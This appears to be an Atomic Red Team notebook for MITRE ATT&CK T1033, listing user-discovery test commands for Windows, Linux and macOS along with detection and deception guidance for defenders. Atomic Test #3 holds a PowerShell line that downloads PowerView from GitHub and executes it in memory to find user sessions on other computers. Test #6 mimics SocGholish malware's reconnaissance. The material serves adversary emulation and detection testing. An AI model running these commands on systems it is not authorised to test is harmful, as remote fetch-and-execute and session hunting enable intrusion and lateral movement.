# T1033 - System Owner/User Discovery
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

## Atomic Tests

### Atomic Test #1 - System Owner/User DiscoveryIdentify System owner or users on an endpoint.

Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. 
Additionally, two files will be written to disk - computers.txt and usernames.txt.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"localhost"
quser
qwinsta.exe /server:localhost
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:localhost ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 1

### Atomic Test #2 - System Owner/User DiscoveryIdentify System owner or users on an endpoint

Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
users
w
who
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 2

### Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 3

### Atomic Test #4 - User Discovery With Env Vars PowerShell ScriptUse the PowerShell environment variables to identify the current logged user.**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 4

#### Cleanup: 
```powershell
Remove-Item -Path .\CurrentactiveUser.txt -Force
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 4 -Cleanup

### Atomic Test #5 - GetCurrent User with PowerShell ScriptUse the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 5

#### Cleanup: 
```powershell
Remove-Item -Path .\CurrentUserObject.txt -Force
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 5 -Cleanup

### Atomic Test #6 - System Discovery - SocGholish whoamiSocGholish performs whoami discovery commands and outputs the results to a tmp file. 
The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.

Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> $env:temp\$file
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 6

#### Cleanup: 
```powershell
Remove-Item -Path $env:temp\rad*.tmp -Force
```

In [ ]:
Invoke-AtomicTest T1033 -TestNumbers 6 -Cleanup

## Detection
`System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.


## Shield Active Defense
### Software Manipulation 
 Make changes to a system's software properties and functions to achieve a desired effect. 

 Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.
#### Opportunity
There is an opportunity for the defender to observe the adversary and control what they can see, what effects they can have, and/or what data they can access.
#### Use Case
A defender can impact an adversary's activity by manipulating or replacing the commands commonly used to display users on a system.
#### Procedures
Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.
Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.
Alter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.
Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.
